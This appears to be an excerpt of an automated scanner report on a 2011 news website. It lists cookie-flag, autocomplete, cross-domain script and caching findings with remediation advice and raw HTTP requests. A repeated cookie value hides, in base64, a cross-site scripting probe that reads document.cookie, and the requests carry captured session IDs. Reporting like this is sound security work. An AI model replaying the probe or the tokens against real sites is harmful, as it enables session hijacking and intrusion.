WT_FPC=id=173.193.214.243-2605364368.30126492:lv=1297189499544:ss=1297189499544; zvents_tracker_sid=12971859055740.8106075366958976; __qca=P0-1704281983-1297185912293
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /forums/forum.jspa HTTP/1.1 Host: www.nydailynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ebNewBandWidth_.www.nydailynews.com=1856%3A1297185968724; sto-id-sg-forums-8081=CDADAKAK; JSESSIONID=D9616AEF4C50BF4404650F3882F4A245; fpc1000563892833=bzFIWmAz|R9p7OeYKaa|fses1000563892833=|R9p7OeYKaa|bzFIWmAz|fvis1000563892833=ZT1odHRwJTNBJTJGJTJGYnVycCUyRnNob3clMkY0JmY9aHR0cCUzQSUyRiUyRnd3dy5ueWRhaWx5bmV3cy5jb20lMkZibG9nczcwZjc1JyUyNTNiYWxlcnQoZG9jdW1lbnQuY29va2llKSUyRiUyRjg0Zjc2NmI5YzE1JTJGamV0cyUyRjIwMTElMkYwMSUyRmxpdmUtY2hhdC1mcmlkYXktbm9vbi0xJmI9UGFnZSUyME5vdCUyMEZvdW5k|8s70ssTYHM|8s70ssTYHM|8s70ssTYHM|8|8s70ssTYHM|8s70ssTYHM; WT_FPC=id=173.193.214.243-2605364368.30126492:lv=1297189628200:ss=1297189499544; sto-id-sg-web-8080=CBACAKAK; zvents_tracker_sid=12971859055740.8106075366958976; Zvents=1djug47bp7; sto-id-sg-nydnapp-8080=CBADAKAK; __qca=P0-1704281983-1297185912293; __vrf=3k7r5l65ggtu5gva;
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /forums/popular-communityjs HTTP/1.1 Host: www.nydailynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ebNewBandWidth_.www.nydailynews.com=1856%3A1297185968724; sto-id-sg-forums-8081=CDADAKAK; JSESSIONID=D9616AEF4C50BF4404650F3882F4A245; fpc1000563892833=bzFIWmAz|R9p7OeYKaa|fses1000563892833=|R9p7OeYKaa|bzFIWmAz|fvis1000563892833=ZT1odHRwJTNBJTJGJTJGYnVycCUyRnNob3clMkY0JmY9aHR0cCUzQSUyRiUyRnd3dy5ueWRhaWx5bmV3cy5jb20lMkZibG9nczcwZjc1JyUyNTNiYWxlcnQoZG9jdW1lbnQuY29va2llKSUyRiUyRjg0Zjc2NmI5YzE1JTJGamV0cyUyRjIwMTElMkYwMSUyRmxpdmUtY2hhdC1mcmlkYXktbm9vbi0xJmI9UGFnZSUyME5vdCUyMEZvdW5k|8s70ssTYHM|8s70ssTYHM|8s70ssTYHM|8|8s70ssTYHM|8s70ssTYHM; WT_FPC=id=173.193.214.243-2605364368.30126492:lv=1297189628200:ss=1297189499544; sto-id-sg-web-8080=CBACAKAK; zvents_tracker_sid=12971859055740.8106075366958976; Zvents=1djug47bp7; sto-id-sg-nydnapp-8080=CBADAKAK; __qca=P0-1704281983-1297185912293; __vrf=3k7r5l65ggtu5gva;
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 X-Powered-By: Servlet 2.4; JBoss-4.0.5.GA (build: CVSTag=Branch_4_0 date=200610162339)/Tomcat-5.5 Set-Cookie: JSESSIONID=B19117E5EE60847C109FFADD8A91AA45; Path=/forums Content-Type: text/javascript;charset=ISO-8859-1 Content-Length: 1619 Date: Tue, 08 Feb 2011 18:23:27 GMT Connection: close
document.write('\t<li><a href=\"http://www.nydailynews.com/forums/thread.jspa?threadID=124030\">Bristol Palin to write memoir due out in June, according to Amazon listing -- but what will they say</a> ...[SNIP]...
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /forums/thread.jspa HTTP/1.1 Host: www.nydailynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ebNewBandWidth_.www.nydailynews.com=1856%3A1297185968724; sto-id-sg-forums-8081=CDADAKAK; JSESSIONID=D9616AEF4C50BF4404650F3882F4A245; fpc1000563892833=bzFIWmAz|R9p7OeYKaa|fses1000563892833=|R9p7OeYKaa|bzFIWmAz|fvis1000563892833=ZT1odHRwJTNBJTJGJTJGYnVycCUyRnNob3clMkY0JmY9aHR0cCUzQSUyRiUyRnd3dy5ueWRhaWx5bmV3cy5jb20lMkZibG9nczcwZjc1JyUyNTNiYWxlcnQoZG9jdW1lbnQuY29va2llKSUyRiUyRjg0Zjc2NmI5YzE1JTJGamV0cyUyRjIwMTElMkYwMSUyRmxpdmUtY2hhdC1mcmlkYXktbm9vbi0xJmI9UGFnZSUyME5vdCUyMEZvdW5k|8s70ssTYHM|8s70ssTYHM|8s70ssTYHM|8|8s70ssTYHM|8s70ssTYHM; WT_FPC=id=173.193.214.243-2605364368.30126492:lv=1297189628200:ss=1297189499544; sto-id-sg-web-8080=CBACAKAK; zvents_tracker_sid=12971859055740.8106075366958976; Zvents=1djug47bp7; sto-id-sg-nydnapp-8080=CBADAKAK; __qca=P0-1704281983-1297185912293; __vrf=3k7r5l65ggtu5gva;
The following cookie was issued by the application and does not have the HttpOnly flag set:
JSESSIONID=xAPb30RhH50nMVMVvntz4Q**; Path=/nydn
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /nydn/content/protected/userAccount.jsp HTTP/1.1 Host: www.nydailynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ebNewBandWidth_.www.nydailynews.com=1856%3A1297185968724; sto-id-sg-forums-8081=CDADAKAK; JSESSIONID=D9616AEF4C50BF4404650F3882F4A245; fpc1000563892833=bzFIWmAz|R9p7OeYKaa|fses1000563892833=|R9p7OeYKaa|bzFIWmAz|fvis1000563892833=ZT1odHRwJTNBJTJGJTJGYnVycCUyRnNob3clMkY0JmY9aHR0cCUzQSUyRiUyRnd3dy5ueWRhaWx5bmV3cy5jb20lMkZibG9nczcwZjc1JyUyNTNiYWxlcnQoZG9jdW1lbnQuY29va2llKSUyRiUyRjg0Zjc2NmI5YzE1JTJGamV0cyUyRjIwMTElMkYwMSUyRmxpdmUtY2hhdC1mcmlkYXktbm9vbi0xJmI9UGFnZSUyME5vdCUyMEZvdW5k|8s70ssTYHM|8s70ssTYHM|8s70ssTYHM|8|8s70ssTYHM|8s70ssTYHM; WT_FPC=id=173.193.214.243-2605364368.30126492:lv=1297189628200:ss=1297189499544; sto-id-sg-web-8080=CBACAKAK; zvents_tracker_sid=12971859055740.8106075366958976; Zvents=1djug47bp7; sto-id-sg-nydnapp-8080=CBADAKAK; __qca=P0-1704281983-1297185912293; __vrf=3k7r5l65ggtu5gva;
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 X-Powered-By: Servlet 2.4; JBoss-4.0.5.GA (build: CVSTag=Branch_4_0 date=200610162339)/Tomcat-5.5 Set-Cookie: JSESSIONID=xAPb30RhH50nMVMVvntz4Q**; Path=/nydn Content-Type: text/html;charset=ISO-8859-1 Date: Tue, 08 Feb 2011 18:28:38 GMT Connection: close Content-Length: 40694
The following cookie was issued by the application and does not have the HttpOnly flag set:
JSESSIONID=AqaNY9-bhh2icgsxCbAiBA**; Path=/nydn
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /nydn/emailArticle.do HTTP/1.1 Host: www.nydailynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ebNewBandWidth_.www.nydailynews.com=1856%3A1297185968724; sto-id-sg-forums-8081=CDADAKAK; JSESSIONID=D9616AEF4C50BF4404650F3882F4A245; fpc1000563892833=bzFIWmAz|R9p7OeYKaa|fses1000563892833=|R9p7OeYKaa|bzFIWmAz|fvis1000563892833=ZT1odHRwJTNBJTJGJTJGYnVycCUyRnNob3clMkY0JmY9aHR0cCUzQSUyRiUyRnd3dy5ueWRhaWx5bmV3cy5jb20lMkZibG9nczcwZjc1JyUyNTNiYWxlcnQoZG9jdW1lbnQuY29va2llKSUyRiUyRjg0Zjc2NmI5YzE1JTJGamV0cyUyRjIwMTElMkYwMSUyRmxpdmUtY2hhdC1mcmlkYXktbm9vbi0xJmI9UGFnZSUyME5vdCUyMEZvdW5k|8s70ssTYHM|8s70ssTYHM|8s70ssTYHM|8|8s70ssTYHM|8s70ssTYHM; WT_FPC=id=173.193.214.243-2605364368.30126492:lv=1297189628200:ss=1297189499544; sto-id-sg-web-8080=CBACAKAK; zvents_tracker_sid=12971859055740.8106075366958976; Zvents=1djug47bp7; sto-id-sg-nydnapp-8080=CBADAKAK; __qca=P0-1704281983-1297185912293; __vrf=3k7r5l65ggtu5gva;
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 X-Powered-By: Servlet 2.4; JBoss-4.0.5.GA (build: CVSTag=Branch_4_0 date=200610162339)/Tomcat-5.5 Set-Cookie: JSESSIONID=AqaNY9-bhh2icgsxCbAiBA**; Path=/nydn Content-Type: text/html;charset=ISO-8859-1 Content-Length: 3304 Date: Tue, 08 Feb 2011 18:28:53 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /index.html HTTP/1.1 Host: www.nydailynews.com Proxy-Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: fpc1000563892833=bzFIWmAz|R9p7OeYKaa|fses1000563892833=|R9p7OeYKaa|bzFIWmAz|fvis1000563892833=ZT1odHRwJTNBJTJGJTJGYnVycCUyRnNob3clMkY0JmY9aHR0cCUzQSUyRiUyRnd3dy5ueWRhaWx5bmV3cy5jb20lMkZibG9nczcwZjc1JyUyNTNiYWxlcnQoZG9jdW1lbnQuY29va2llKSUyRiUyRjg0Zjc2NmI5YzE1JTJGamV0cyUyRjIwMTElMkYwMSUyRmxpdmUtY2hhdC1mcmlkYXktbm9vbi0xJmI9UGFnZSUyME5vdCUyMEZvdW5k|8s70ssTYHM|8s70ssTYHM|8s70ssTYHM|8|8s70ssTYHM|8s70ssTYHM; WT_FPC=id=173.193.214.243-2605364368.30126492:lv=1296236506383:ss=1296236490305
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /nydn/dwr/engine.js HTTP/1.1 Host: www.nydailynews.com Proxy-Connection: keep-alive Referer: http://www.nydailynews.com/index.html Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: fpc1000563892833=bzFIWmAz|R9p7OeYKaa|fses1000563892833=|R9p7OeYKaa|bzFIWmAz|fvis1000563892833=ZT1odHRwJTNBJTJGJTJGYnVycCUyRnNob3clMkY0JmY9aHR0cCUzQSUyRiUyRnd3dy5ueWRhaWx5bmV3cy5jb20lMkZibG9nczcwZjc1JyUyNTNiYWxlcnQoZG9jdW1lbnQuY29va2llKSUyRiUyRjg0Zjc2NmI5YzE1JTJGamV0cyUyRjIwMTElMkYwMSUyRmxpdmUtY2hhdC1mcmlkYXktbm9vbi0xJmI9UGFnZSUyME5vdCUyMEZvdW5k|8s70ssTYHM|8s70ssTYHM|8s70ssTYHM|8|8s70ssTYHM|8s70ssTYHM; WT_FPC=id=173.193.214.243-2605364368.30126492:lv=1296236506383:ss=1296236490305; sto-id-sg-web-8080=CBACAKAK; Zvents=1djug47bp7
/* * Copyright 2005 Joe Walker * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of th ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /nydn/dwr/interface/mostEmailedStories.js HTTP/1.1 Host: www.nydailynews.com Proxy-Connection: keep-alive Referer: http://www.nydailynews.com/index.html Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: fpc1000563892833=bzFIWmAz|R9p7OeYKaa|fses1000563892833=|R9p7OeYKaa|bzFIWmAz|fvis1000563892833=ZT1odHRwJTNBJTJGJTJGYnVycCUyRnNob3clMkY0JmY9aHR0cCUzQSUyRiUyRnd3dy5ueWRhaWx5bmV3cy5jb20lMkZibG9nczcwZjc1JyUyNTNiYWxlcnQoZG9jdW1lbnQuY29va2llKSUyRiUyRjg0Zjc2NmI5YzE1JTJGamV0cyUyRjIwMTElMkYwMSUyRmxpdmUtY2hhdC1mcmlkYXktbm9vbi0xJmI9UGFnZSUyME5vdCUyMEZvdW5k|8s70ssTYHM|8s70ssTYHM|8s70ssTYHM|8|8s70ssTYHM|8s70ssTYHM; WT_FPC=id=173.193.214.243-2605364368.30126492:lv=1296236506383:ss=1296236490305; sto-id-sg-web-8080=CBACAKAK; Zvents=1djug47bp7
// Provide a default path to dwr.engine if (dwr == null) var dwr = {}; if (dwr.engine == null) dwr.engine = {}; if (DWREngine == null) var DWREngine = dwr.engine;
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /nydn/dwr/interface/mostPopularStories.js HTTP/1.1 Host: www.nydailynews.com Proxy-Connection: keep-alive Referer: http://www.nydailynews.com/index.html Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: fpc1000563892833=bzFIWmAz|R9p7OeYKaa|fses1000563892833=|R9p7OeYKaa|bzFIWmAz|fvis1000563892833=ZT1odHRwJTNBJTJGJTJGYnVycCUyRnNob3clMkY0JmY9aHR0cCUzQSUyRiUyRnd3dy5ueWRhaWx5bmV3cy5jb20lMkZibG9nczcwZjc1JyUyNTNiYWxlcnQoZG9jdW1lbnQuY29va2llKSUyRiUyRjg0Zjc2NmI5YzE1JTJGamV0cyUyRjIwMTElMkYwMSUyRmxpdmUtY2hhdC1mcmlkYXktbm9vbi0xJmI9UGFnZSUyME5vdCUyMEZvdW5k|8s70ssTYHM|8s70ssTYHM|8s70ssTYHM|8|8s70ssTYHM|8s70ssTYHM; WT_FPC=id=173.193.214.243-2605364368.30126492:lv=1296236506383:ss=1296236490305; sto-id-sg-web-8080=CBACAKAK; Zvents=1djug47bp7
// Provide a default path to dwr.engine if (dwr == null) var dwr = {}; if (dwr.engine == null) dwr.engine = {}; if (DWREngine == null) var DWREngine = dwr.engine;
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /nydn/dwr/util.js HTTP/1.1 Host: www.nydailynews.com Proxy-Connection: keep-alive Referer: http://www.nydailynews.com/index.html Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: fpc1000563892833=bzFIWmAz|R9p7OeYKaa|fses1000563892833=|R9p7OeYKaa|bzFIWmAz|fvis1000563892833=ZT1odHRwJTNBJTJGJTJGYnVycCUyRnNob3clMkY0JmY9aHR0cCUzQSUyRiUyRnd3dy5ueWRhaWx5bmV3cy5jb20lMkZibG9nczcwZjc1JyUyNTNiYWxlcnQoZG9jdW1lbnQuY29va2llKSUyRiUyRjg0Zjc2NmI5YzE1JTJGamV0cyUyRjIwMTElMkYwMSUyRmxpdmUtY2hhdC1mcmlkYXktbm9vbi0xJmI9UGFnZSUyME5vdCUyMEZvdW5k|8s70ssTYHM|8s70ssTYHM|8s70ssTYHM|8|8s70ssTYHM|8s70ssTYHM; WT_FPC=id=173.193.214.243-2605364368.30126492:lv=1296236506383:ss=1296236490305; sto-id-sg-web-8080=CBACAKAK; Zvents=1djug47bp7
/* * Copyright 2005 Joe Walker * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of th ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /homedelivery/index.php HTTP/1.1 Host: www.nydailynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ebNewBandWidth_.www.nydailynews.com=1856%3A1297185968724; sto-id-sg-forums-8081=CDADAKAK; JSESSIONID=D9616AEF4C50BF4404650F3882F4A245; fpc1000563892833=bzFIWmAz|R9p7OeYKaa|fses1000563892833=|R9p7OeYKaa|bzFIWmAz|fvis1000563892833=ZT1odHRwJTNBJTJGJTJGYnVycCUyRnNob3clMkY0JmY9aHR0cCUzQSUyRiUyRnd3dy5ueWRhaWx5bmV3cy5jb20lMkZibG9nczcwZjc1JyUyNTNiYWxlcnQoZG9jdW1lbnQuY29va2llKSUyRiUyRjg0Zjc2NmI5YzE1JTJGamV0cyUyRjIwMTElMkYwMSUyRmxpdmUtY2hhdC1mcmlkYXktbm9vbi0xJmI9UGFnZSUyME5vdCUyMEZvdW5k|8s70ssTYHM|8s70ssTYHM|8s70ssTYHM|8|8s70ssTYHM|8s70ssTYHM; WT_FPC=id=173.193.214.243-2605364368.30126492:lv=1297189628200:ss=1297189499544; sto-id-sg-web-8080=CBACAKAK; zvents_tracker_sid=12971859055740.8106075366958976; Zvents=1djug47bp7; sto-id-sg-nydnapp-8080=CBADAKAK; __qca=P0-1704281983-1297185912293; __vrf=3k7r5l65ggtu5gva;
Response
HTTP/1.1 200 OK Date: Tue, 08 Feb 2011 18:40:28 GMT Server: Apache Content-Length: 3711 Connection: close Content-Type: text/html Content-Language: en Set-Cookie: sto-id-sg-http-web05_6=CCACAKAK; Expires=Tue, 08-Feb-2011 19:40:56 GMT; Path=/
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"> <html> <head> <title>The New York Daily News</title> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<meta name="W ...[SNIP]...
5. Password field with autocomplete enabledpreviousnext
Summary
Severity:
Low
Confidence:
Certain
Host:
http://www.nydailynews.com
Path:
/nydn/content/protected/userAccount.jsp
Issue detail
The page contains a form with the following action URL:
http://www.nydailynews.com/nydn/login.do
The form contains the following password field with autocomplete enabled:
password
Issue background
Most browsers have a facility to remember user credentials that are entered into HTML forms. This function can be configured by the user and also by applications which employ user credentials. If the function is enabled, then credentials entered by the user are stored on their local computer and retrieved by the browser on future visits to the same application.
The stored credentials can be captured by an attacker who gains access to the computer, either locally or through some remote compromise. Further, methods have existed whereby a malicious web site can retrieve the stored credentials for other applications, by exploiting browser vulnerabilities or through application-level cross-domain attacks.
Issue remediation
To prevent browsers from storing credentials entered into HTML forms, you should include the attribute autocomplete="off" within the FORM tag (to protect all form fields) or within the relevant INPUT tags (to protect specific individual fields).
Request
GET /nydn/content/protected/userAccount.jsp HTTP/1.1 Host: www.nydailynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ebNewBandWidth_.www.nydailynews.com=1856%3A1297185968724; sto-id-sg-forums-8081=CDADAKAK; JSESSIONID=D9616AEF4C50BF4404650F3882F4A245; fpc1000563892833=bzFIWmAz|R9p7OeYKaa|fses1000563892833=|R9p7OeYKaa|bzFIWmAz|fvis1000563892833=ZT1odHRwJTNBJTJGJTJGYnVycCUyRnNob3clMkY0JmY9aHR0cCUzQSUyRiUyRnd3dy5ueWRhaWx5bmV3cy5jb20lMkZibG9nczcwZjc1JyUyNTNiYWxlcnQoZG9jdW1lbnQuY29va2llKSUyRiUyRjg0Zjc2NmI5YzE1JTJGamV0cyUyRjIwMTElMkYwMSUyRmxpdmUtY2hhdC1mcmlkYXktbm9vbi0xJmI9UGFnZSUyME5vdCUyMEZvdW5k|8s70ssTYHM|8s70ssTYHM|8s70ssTYHM|8|8s70ssTYHM|8s70ssTYHM; WT_FPC=id=173.193.214.243-2605364368.30126492:lv=1297189628200:ss=1297189499544; sto-id-sg-web-8080=CBACAKAK; zvents_tracker_sid=12971859055740.8106075366958976; Zvents=1djug47bp7; sto-id-sg-nydnapp-8080=CBADAKAK; __qca=P0-1704281983-1297185912293; __vrf=3k7r5l65ggtu5gva;
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 X-Powered-By: Servlet 2.4; JBoss-4.0.5.GA (build: CVSTag=Branch_4_0 date=200610162339)/Tomcat-5.5 Set-Cookie: JSESSIONID=xAPb30RhH50nMVMVvntz4Q**; Path=/nydn Content-Type: text/html;charset=ISO-8859-1 Date: Tue, 08 Feb 2011 18:28:38 GMT Connection: close Content-Length: 40694
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Issue background
If the secure flag is set on a cookie, then browsers will not submit the cookie in any requests that use an unencrypted HTTP connection, thereby preventing the cookie from being trivially intercepted by an attacker monitoring network traffic. If the secure flag is not set, then the cookie will be transmitted in clear-text if the user visits any HTTP URLs within the cookie's scope. An attacker may be able to induce this event by feeding a user suitable links, either directly or via another web site. Even if the domain which issued the cookie does not host any content that is accessed over HTTP, an attacker may be able to use links of the form http://example.com:443/ to perform the same attack.
Issue remediation
The secure flag should be set on all cookies that are used for transmitting sensitive data when accessing content over HTTPS. If cookies are used to transmit session tokens, then areas of the application that are accessed over HTTPS should employ their own session handling mechanism, and the session tokens used should never be transmitted over unencrypted communications.
Request
GET /homedelivery/index.php HTTP/1.1 Host: www.nydailynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ebNewBandWidth_.www.nydailynews.com=1856%3A1297185968724; sto-id-sg-forums-8081=CDADAKAK; JSESSIONID=D9616AEF4C50BF4404650F3882F4A245; fpc1000563892833=bzFIWmAz|R9p7OeYKaa|fses1000563892833=|R9p7OeYKaa|bzFIWmAz|fvis1000563892833=ZT1odHRwJTNBJTJGJTJGYnVycCUyRnNob3clMkY0JmY9aHR0cCUzQSUyRiUyRnd3dy5ueWRhaWx5bmV3cy5jb20lMkZibG9nczcwZjc1JyUyNTNiYWxlcnQoZG9jdW1lbnQuY29va2llKSUyRiUyRjg0Zjc2NmI5YzE1JTJGamV0cyUyRjIwMTElMkYwMSUyRmxpdmUtY2hhdC1mcmlkYXktbm9vbi0xJmI9UGFnZSUyME5vdCUyMEZvdW5k|8s70ssTYHM|8s70ssTYHM|8s70ssTYHM|8|8s70ssTYHM|8s70ssTYHM; WT_FPC=id=173.193.214.243-2605364368.30126492:lv=1297189628200:ss=1297189499544; sto-id-sg-web-8080=CBACAKAK; zvents_tracker_sid=12971859055740.8106075366958976; Zvents=1djug47bp7; sto-id-sg-nydnapp-8080=CBADAKAK; __qca=P0-1704281983-1297185912293; __vrf=3k7r5l65ggtu5gva;
Response
HTTP/1.1 200 OK Date: Tue, 08 Feb 2011 18:40:28 GMT Server: Apache Content-Length: 3711 Connection: close Content-Type: text/html Content-Language: en Set-Cookie: sto-id-sg-http-web05_6=CCACAKAK; Expires=Tue, 08-Feb-2011 19:40:56 GMT; Path=/
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"> <html> <head> <title>The New York Daily News</title> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<meta name="W ...[SNIP]...
7. Cross-domain script includepreviousnext There are 34 instances of this issue:
When an application includes a script from an external domain, this script is executed by the browser within the security context of the invoking application. The script can therefore do anything that the application's own scripts can do, such as accessing application data and performing actions within the context of the current user.
If you include a script from an external domain, then you are trusting that domain with the data and functionality of your application, and you are trusting the domain's own security to prevent an attacker from modifying the script to perform malicious actions within your application.
Issue remediation
Scripts should not be included from untrusted domains. If you have a requirement which a third-party script appears to fulfil, then you should ideally copy the contents of that script onto your own domain and include it from there. If that is not possible (e.g. for licensing reasons) then you should consider reimplementing the script's functionality within your own code.
The presence of email addresses within application responses does not necessarily constitute a security vulnerability. Email addresses may appear intentionally within contact information, and many applications (such as web mail) include arbitrary third-party email addresses within their core content.
However, email addresses of developers and other individuals (whether appearing on-screen or hidden within page source) may disclose information that is useful to an attacker; for example, they may represent usernames that can be used at the application's login, and they may be used in social engineering attacks against the organisation's personnel. Unnecessary or excessive disclosure of email addresses may also lead to an increase in the volume of spam email received.
Issue remediation
You should review the email addresses being disclosed by the application, and consider removing any that are unnecessary, or replacing personal addresses with anonymous mailbox addresses (such as helpdesk@example.com).
Unless directed otherwise, browsers may store a local cached copy of content received from web servers. Some browsers, including Internet Explorer, cache content accessed via HTTPS. If sensitive information in application responses is stored in the local cache, then this may be retrieved by other users who have access to the same computer at a future time.
Issue remediation
The application should return caching directives instructing browsers not to store local copies of any sensitive data. Often, this can be achieved by configuring the web server to prevent caching for relevant paths within the web root. Alternatively, most web development platforms allow you to control the server's caching directives from within individual scripts. Ideally, the web server should return the following HTTP headers in all responses containing sensitive content:
Cache-control: no-store
Pragma: no-cache
Request
GET /homedelivery/index.php HTTP/1.1 Host: www.nydailynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ebNewBandWidth_.www.nydailynews.com=1856%3A1297185968724; sto-id-sg-forums-8081=CDADAKAK; JSESSIONID=D9616AEF4C50BF4404650F3882F4A245; fpc1000563892833=bzFIWmAz|R9p7OeYKaa|fses1000563892833=|R9p7OeYKaa|bzFIWmAz|fvis1000563892833=ZT1odHRwJTNBJTJGJTJGYnVycCUyRnNob3clMkY0JmY9aHR0cCUzQSUyRiUyRnd3dy5ueWRhaWx5bmV3cy5jb20lMkZibG9nczcwZjc1JyUyNTNiYWxlcnQoZG9jdW1lbnQuY29va2llKSUyRiUyRjg0Zjc2NmI5YzE1JTJGamV0cyUyRjIwMTElMkYwMSUyRmxpdmUtY2hhdC1mcmlkYXktbm9vbi0xJmI9UGFnZSUyME5vdCUyMEZvdW5k|8s70ssTYHM|8s70ssTYHM|8s70ssTYHM|8|8s70ssTYHM|8s70ssTYHM; WT_FPC=id=173.193.214.243-2605364368.30126492:lv=1297189628200:ss=1297189499544; sto-id-sg-web-8080=CBACAKAK; zvents_tracker_sid=12971859055740.8106075366958976; Zvents=1djug47bp7; sto-id-sg-nydnapp-8080=CBADAKAK; __qca=P0-1704281983-1297185912293; __vrf=3k7r5l65ggtu5gva;
Response
HTTP/1.1 200 OK Date: Tue, 08 Feb 2011 18:40:28 GMT Server: Apache Content-Length: 3711 Connection: close Content-Type: text/html Content-Language: en Set-Cookie: sto-id-sg-http-web05_6=CCACAKAK; Expires=Tue, 08-Feb-2011 19:40:56 GMT; Path=/
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"> <html> <head> <title>The New York Daily News</title> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
If a web response states that it contains HTML content but does not specify a character set, then the browser may analyse the HTML and attempt to determine which character set it appears to be using. Even if the majority of the HTML actually employs a standard character set such as UTF-8, the presence of non-standard characters anywhere in the response may cause the browser to interpret the content using a different character set. This can have unexpected results, and can lead to cross-site scripting vulnerabilities in which non-standard encodings like UTF-7 can be used to bypass the application's defensive filters.
In most cases, the absence of a charset directive does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.
Issue remediation
For every response containing HTML content, the application should include within the Content-type header a directive specifying a standard recognised character set, for example charset=ISO-8859-1.
Request
